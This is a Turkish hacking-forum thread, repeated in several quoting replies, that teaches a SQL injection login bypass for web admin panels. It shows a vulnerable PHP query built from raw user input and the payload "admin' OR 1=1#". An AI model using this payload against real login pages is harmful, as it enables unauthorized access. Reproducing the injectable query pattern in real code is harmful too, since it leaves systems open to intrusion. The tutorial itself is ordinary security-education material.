Admin ByPass Nasıl Yapılır?

LordSUCCESS

Uzman üye
17 Eyl 2023
1,329
592
FTP Server
oqk18ir.png


Merhabalar Ben LordSUCCESS, Bugünki konumuz admin panel bypass nasıl yapılır onu göreceğiz


iwxqmay.png


Admin Panel ByPass; Bir web uygulamasının yönetici paneline yetkisiz erişim elde etmek için kullanılan yöntemlerin genel adıdır. Bu, genellikle güvenlik açıklarını veya kimlik doğrulama mekanizmalarını atlama yoluyla gerçekleştirilir ve kötü niyetli kullanıcıların web uygulamasına zarar vermesine olanak tanır.


ro3fzuc.png


Zafiyet Nasıl Ortaya Çıkar
PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullaniciadi' AND apassword='$sifre'"
Gördüğünüz gibi kullanıcının girdiği değeri sorguda veriyor buda bu zafiyeti ortaya çıkartıyor

ro3fzuc.png

Zafiyet Nasıl Sömürebiliriz

Bypass etmek için bazı payloadlar vardır onları kullanıcı adına veya şifre kısmına yazarak bypass edebiliriz

ro3fzuc.png


Kullandığım Dosya


Dosya
VirusTotal

ro3fzuc.png


2cu4moz.png

i2o3iy4.png

cu2fx69.png


Evet gördüğünüz gibi bypass ettik, Şimdi ise nasıl oldu onu açıklayalım
PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre'"; // Normal Sorgu
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre' OR 1=1#''"; // ByPass Edilen Sorgu

'#' Bu işaret SQL sorgusunda yorum satırı eklemek için kullanılır
'1=1' Mantığı şudur: Her zaman doğru olan bir koşul oluşturulmuş olur

Kod:
//Payload
admin' OR 1=1#

Kısaca Bugün Kullanıcı Girişi Olarak Sağlanan Verileri Manipüle Etmeyi Öğrendik

Okuyan Herkese Teşekkür Ederim :)

 

StrongsAire.exe

Black Hat Junior
15 Tem 2010
744
77
oqk18ir.png


Merhabalar Ben LordSUCCESS, Bugünki konumuz admin panel bypass nasıl yapılır onu göreceğiz


iwxqmay.png


Admin Panel ByPass; Bir web uygulamasının yönetici paneline yetkisiz erişim elde etmek için kullanılan yöntemlerin genel adıdır. Bu, genellikle güvenlik açıklarını veya kimlik doğrulama mekanizmalarını atlama yoluyla gerçekleştirilir ve kötü niyetli kullanıcıların web uygulamasına zarar vermesine olanak tanır.

ro3fzuc.png


Zafiyet Nasıl Ortaya Çıkar

PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullaniciadi' AND apassword='$sifre'"
Gördüğünüz gibi kullanıcının girdiği değeri sorguda veriyor buda bu zafiyeti ortaya çıkartıyor

ro3fzuc.png



Zafiyet Nasıl Sömürebiliriz

Bypass etmek için bazı payloadlar vardır onları kullanıcı adına veya şifre kısmına yazarak bypass edebiliriz

ro3fzuc.png


Kullandığım Dosya


Dosya
VirusTotal

ro3fzuc.png


2cu4moz.png

i2o3iy4.png

cu2fx69.png


Evet gördüğünüz gibi bypass ettik, Şimdi ise nasıl oldu onu açıklayalım
PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre'"; // Normal Sorgu
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre' OR 1=1#''"; // ByPass Edilen Sorgu

'#' Bu işaret SQL sorgusunda yorum satırı eklemek için kullanılır
'1=1' Mantığı şudur: Her zaman doğru olan bir koşul oluşturulmuş olur

Kod:
//Payload
admin' OR 1=1#

Kısaca Bugün Kullanıcı Girişi Olarak Sağlanan Verileri Manipüle Etmeyi Öğrendik

Okuyan Herkese Teşekkür Ederim :)

Eline sağlık
 

LordSUCCESS

Uzman üye
17 Eyl 2023
1,329
592
FTP Server
😍
Admin Bypass nedir ? :D düm düz SQLi bu konu ismini düzeltebilmen için yardımcı olayım

SQL Injection to Bypass Authentication

Sağol dostum :)
Detaylandırılabilir, eline sağlık.
Teşekkürler :)
Teşekkürler :)
eline sağlık biraz daha detaya inilirse süper olur
Teşekkürler :)
Güzel hazırlanmış eline sağlık
Teşekkürler :)
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,533
1,140
Anıtkabir
oqk18ir.png


Merhabalar Ben LordSUCCESS, Bugünki konumuz admin panel bypass nasıl yapılır onu göreceğiz


iwxqmay.png


Admin Panel ByPass; Bir web uygulamasının yönetici paneline yetkisiz erişim elde etmek için kullanılan yöntemlerin genel adıdır. Bu, genellikle güvenlik açıklarını veya kimlik doğrulama mekanizmalarını atlama yoluyla gerçekleştirilir ve kötü niyetli kullanıcıların web uygulamasına zarar vermesine olanak tanır.

ro3fzuc.png


Zafiyet Nasıl Ortaya Çıkar

PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullaniciadi' AND apassword='$sifre'"
Gördüğünüz gibi kullanıcının girdiği değeri sorguda veriyor buda bu zafiyeti ortaya çıkartıyor

ro3fzuc.png



Zafiyet Nasıl Sömürebiliriz

Bypass etmek için bazı payloadlar vardır onları kullanıcı adına veya şifre kısmına yazarak bypass edebiliriz

ro3fzuc.png


Kullandığım Dosya


Dosya
VirusTotal

ro3fzuc.png


2cu4moz.png

i2o3iy4.png

cu2fx69.png


Evet gördüğünüz gibi bypass ettik, Şimdi ise nasıl oldu onu açıklayalım
PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre'"; // Normal Sorgu
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre' OR 1=1#''"; // ByPass Edilen Sorgu

'#' Bu işaret SQL sorgusunda yorum satırı eklemek için kullanılır
'1=1' Mantığı şudur: Her zaman doğru olan bir koşul oluşturulmuş olur

Kod:
//Payload
admin' OR 1=1#

Kısaca Bugün Kullanıcı Girişi Olarak Sağlanan Verileri Manipüle Etmeyi Öğrendik

Okuyan Herkese Teşekkür Ederim :)

Eline sağlık hocam
 

'Delta Türk'

Moderasyon Ekibi Çaylak
2 Mar 2024
77
41
Sorgusuz
oqk18ir.png


Merhabalar Ben LordSUCCESS, Bugünki konumuz admin panel bypass nasıl yapılır onu göreceğiz


iwxqmay.png


Admin Panel ByPass; Bir web uygulamasının yönetici paneline yetkisiz erişim elde etmek için kullanılan yöntemlerin genel adıdır. Bu, genellikle güvenlik açıklarını veya kimlik doğrulama mekanizmalarını atlama yoluyla gerçekleştirilir ve kötü niyetli kullanıcıların web uygulamasına zarar vermesine olanak tanır.

ro3fzuc.png


Zafiyet Nasıl Ortaya Çıkar

PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullaniciadi' AND apassword='$sifre'"
Gördüğünüz gibi kullanıcının girdiği değeri sorguda veriyor buda bu zafiyeti ortaya çıkartıyor

ro3fzuc.png



Zafiyet Nasıl Sömürebiliriz

Bypass etmek için bazı payloadlar vardır onları kullanıcı adına veya şifre kısmına yazarak bypass edebiliriz

ro3fzuc.png


Kullandığım Dosya


Dosya
VirusTotal

ro3fzuc.png


2cu4moz.png

i2o3iy4.png

cu2fx69.png


Evet gördüğünüz gibi bypass ettik, Şimdi ise nasıl oldu onu açıklayalım
PHP:
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre'"; // Normal Sorgu
$sql = "SELECT * FROM admin_tb WHERE username='$kullanici_adi' AND apassword='$sifre' OR 1=1#''"; // ByPass Edilen Sorgu

'#' Bu işaret SQL sorgusunda yorum satırı eklemek için kullanılır
'1=1' Mantığı şudur: Her zaman doğru olan bir koşul oluşturulmuş olur

Kod:
//Payload
admin' OR 1=1#

Kısaca Bugün Kullanıcı Girişi Olarak Sağlanan Verileri Manipüle Etmeyi Öğrendik

Okuyan Herkese Teşekkür Ederim :)

Login bypass ile sadece en düşük kullanıcı hesabına girersin
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.